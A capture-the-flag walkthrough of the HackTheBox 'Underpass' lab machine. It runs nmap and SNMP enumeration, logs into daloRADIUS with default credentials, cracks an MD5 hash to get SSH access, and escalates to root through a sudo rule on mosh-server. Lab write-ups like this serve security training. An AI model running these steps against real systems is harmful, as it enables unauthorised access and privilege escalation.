Underpass

🌐 Website: HackTheBox
🔥 Level: Easy
🖥️ OS: Linux
🔗 Link: Underpass

Foothold¶

target=10.10.11.48

Initial Nmap Scan¶

└─$ nmap -sC -sV $target
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-14 12:37 UTC
Nmap scan report for 10.10.11.48
Host is up (0.024s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_  256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.96 seconds

Website Enumeration¶

The website shows the default Ubuntu page. Let's use feroxbuster to find directories.

feroxbuster --url http://underpass.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

Further Nmap Scan¶

Relaunching nmap with different depth:

sudo nmap -sU --min-rate=10000 10.10.11.48 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-14 12:52 UTC
Warning: 10.10.11.48 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.48
Host is up (0.035s latency).
Not shown: 65460 open|filtered udp ports (no-response), 74 closed udp ports (port-unreach)
PORT    STATE SERVICE
161/udp open  snmp

SNMP Enumeration¶

snmpwalk -v1 -c public $target

iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"
iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"
iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas"

Add UnDerPass.htb to your hosts file. We notice the user steve.

Daloradius Enumeration¶

Found a GitHub repository. Let's enumerate directories under daloradius.

feroxbuster --url http://underpass.htb/daloradius -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

Found default credentials in the installation doc:

http://underpass.htb/daloradius/doc/install/INSTALL

Login:
    username: administrator
    password: radius

Directory Search¶

dirsearch -u http://underpass.htb/daloradius/

Downloaded docker-compose.yml:

environment:
  - MYSQL_DATABASE=radius
  - MYSQL_USER=radius
  - MYSQL_PASSWORD=radiusdbpw
  - MYSQL_ROOT_PASSWORD=radiusrootdbpw

dirsearch -u http://underpass.htb/daloradius/app/

Default credentials work!

User Access¶

Found user svcMosh with password 412DD4759978ACFCC81DEAB01B382403.

Cracking the Password¶

john md5 --format=Raw-MD5 -w=/usr/share/wordlists/rockyou.txt

Password: underwaterfriends

ssh svcMosh@10.10.11.48

Privilege Escalation¶

svcMosh@underpass:~$ sudo -l
User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server

Exploiting Mosh¶

mosh --server="sudo /usr/bin/mosh-server" localhost

Root access obtained. The flag is in the root folder.